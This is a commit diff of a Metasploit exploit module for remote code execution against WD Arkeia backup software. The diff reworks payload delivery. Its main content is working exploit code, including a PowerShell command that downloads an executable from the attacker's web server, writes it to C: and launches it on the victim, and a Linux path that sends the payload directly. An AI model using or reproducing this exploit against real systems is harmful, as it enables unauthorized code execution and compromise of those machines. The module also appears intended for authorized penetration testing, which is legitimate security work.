jvazquez-r7
parent
e1192c75a9
commit
c9d2ab58d3
|
|
@ -9,11 +9,10 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
Rank = ExcellentRanking
|
||||
|
||||
include Msf::Exploit::Remote::Tcp
|
||||
include Msf::Exploit::Remote::HttpServer
|
||||
include Msf::Exploit::Remote::HttpServer::HTML
|
||||
include Msf::Exploit::EXE
|
||||
include Msf::Exploit::FileDropper
|
||||
|
||||
|
||||
def initialize(info = {})
|
||||
super(update_info(info,
|
||||
'Name' => 'WD Arkeia Remote Code Execution',
|
||||
|
|
@ -35,6 +34,7 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
[
|
||||
],
|
||||
'Privileged' => true,
|
||||
'Stance' => Msf::Exploit::Stance::Aggressive,
|
||||
'Payload' =>
|
||||
{
|
||||
'DisableNops' => true
|
||||
|
|
@ -312,30 +312,26 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
@down_file = rand_text_alpha(8+rand(8))
|
||||
@pl = generate_payload_exe
|
||||
|
||||
srv_host = Rex::Socket.source_address(rhost)
|
||||
|
||||
service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + '/' + @down_file
|
||||
print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
|
||||
start_service({'Uri' => {
|
||||
'Proc' => Proc.new { |cli, req|
|
||||
on_request_uri(cli, req)
|
||||
},
|
||||
'Path' => '/' + @down_file
|
||||
}})
|
||||
|
||||
# PowerShell web download. The char replacement is needed because using the "/" character twice (like http://) directly is not possible on Windows agents.
|
||||
command = "PowerShell -Command \"$s=[CHAR][BYTE]47;$b=\\\"http:$($s)$($s)#{srv_host}:#{datastore['SRVPORT']}$($s)#{@down_file}\\\";"
|
||||
command << "(New-Object System.Net.WebClient).DownloadFile($b,'c:/#{@down_file}.exe');"
|
||||
command << "(New-Object -com Shell.Application).ShellExecute('c:/#{@down_file}.exe');\""
|
||||
|
||||
communicate(command)
|
||||
|
||||
begin
|
||||
Timeout.timeout(datastore['HTTP_DELAY']) {super}
|
||||
rescue Timeout::Error
|
||||
end
|
||||
elsif target.name =~ /Linux/
|
||||
communicate(payload.encoded)
|
||||
return
|
||||
end
|
||||
end
|
||||
|
||||
def primer
|
||||
@payload_url = get_uri
|
||||
|
||||
# PowerShell web download. The char replacement is needed because using the "/" character twice (like http://) directly is not possible on Windows agents.
|
||||
command = "PowerShell -Command \"$s=[CHAR][BYTE]47;$b=\\\"#{@payload_url.gsub(/\//, '$($s)')}\\\";"
|
||||
command << "(New-Object System.Net.WebClient).DownloadFile($b,'c:/#{@down_file}.exe');"
|
||||
command << "(New-Object -com Shell.Application).ShellExecute('c:/#{@down_file}.exe');\""
|
||||
|
||||
communicate(command)
|
||||
end
|
||||
|
||||
def communicate(command)
|
||||
print_status("#{rhost}:#{rport} - Connecting to Arkeia daemon")
|
||||
|
|
@ -543,20 +539,14 @@ class Metasploit3 < Msf::Exploit::Remote
|
|||
disconnect
|
||||
fail_with(Failure::Unknown, "#{rhost}:#{rport} - Failure reading packet data")
|
||||
end
|
||||
|
||||
# Wait for our payload to be sent, else HTTP server might shutdown too quick
|
||||
select(nil, nil, nil, datastore['HTTP_DELAY'])
|
||||
|
||||
end
|
||||
|
||||
def on_request_uri(cli, request)
|
||||
unless @pl
|
||||
print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
|
||||
return
|
||||
end
|
||||
print_status("#{rhost}:#{rport} - Sending the payload to the server...")
|
||||
register_files_for_cleanup("c:\\#{@down_file}.exe")
|
||||
print_status("Request: #{request.uri}")
|
||||
if request.uri == get_resource
|
||||
print_status('Sending payload...')
|
||||
send_response(cli, @pl)
|
||||
register_files_for_cleanup("c:\\#{@down_file}.exe")
|
||||
end
|
||||
end
|
||||
|
||||
end
|
||||
|
|
|
|||
Loading…
Reference in New Issue